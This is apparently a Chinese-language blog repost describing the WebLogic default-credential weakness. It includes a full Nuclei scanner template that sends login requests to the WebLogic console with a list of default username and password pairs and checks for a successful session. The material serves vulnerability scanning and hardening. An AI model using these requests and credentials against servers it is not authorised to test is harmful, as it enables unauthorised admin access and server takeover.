WebLogic Default Login Vulnerability

漏洞信息

漏洞名称: WebLogic Default Login Vulnerability

漏洞类型: 弱口令

漏洞等级: 高危

漏洞描述: WebLogic是由Oracle公司开发的一款企业级Java应用服务器,广泛用于构建和部署分布式企业级应用。它支持多种Java EE标准,提供了高性能、高可用性的服务,是企业中常见的中间件解决方案。

该漏洞属于弱口令漏洞,原因是WebLogic服务器在安装后默认使用一组已知的用户名和密码组合。攻击者可以利用这些默认凭证未经授权访问WebLogic的管理控制台,进而执行恶意操作。这种漏洞的存在主要是因为系统管理员未能及时修改默认的登录凭证,或者使用了容易被猜测的密码。

此漏洞的安全风险较高,因为攻击者可以利用默认凭证直接登录系统,无需任何复杂的攻击手段。一旦登录成功,攻击者可以执行任意代码、访问敏感数据、甚至完全控制受影响的WebLogic服务器。由于WebLogic通常部署在企业内部网络或云环境中,这种漏洞可能导致严重的数据泄露和服务中断。此外,由于攻击过程简单,自动化工具可以轻易地大规模扫描和利用此类漏洞。

产品厂商: Oracle

产品名称: WebLogic

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fdefault-logins%2Fweblogic%2Fweblogic-weak-login.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

id: weblogic-weak-login

info:
name: WebLogic Default Login
author: pdteam
severity: high
description: WebLogic default login credentials were discovered.
reference:
- https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
- https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 16
tags: default-login,weblogic,vulhub

http:
- raw:
- |
GET /console/ HTTP/1.1
Host: {{Hostname}}
- |
POST /console/j_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8

attack: pitchfork
payloads:
username:
- weblogic
- weblogic
- weblogic
- weblogic
- weblogic
- admin
- admin
- system
password:
- weblogic
- weblogic1
- welcome1
- Oracle@123
- weblogic123
- 12345678
- security
- password
stop-at-first-match: true

matchers-condition: and
matchers:
- type: word
part: header
words:
- "/console/index.jsp"
- "ADMINCONSOLESESSION"
condition: and

- type: status
status:
- 302
# digest: 490a00463044022028c592d8b82db6a1ab5f8e983de3e9d9f4e0858a2c47159bb342be7bd7bd9b2f02201db17b7da5c8771212ebe56d7302626d18e95bc798c8207e46ba38fd49b65fe9:922c64590222798bb761d5b6d8e72950


WebLogic Default Login Vulnerability
http://example.com/2025/07/21/github_2151365455/
作者
lianccc
发布于
2025年7月21日
许可协议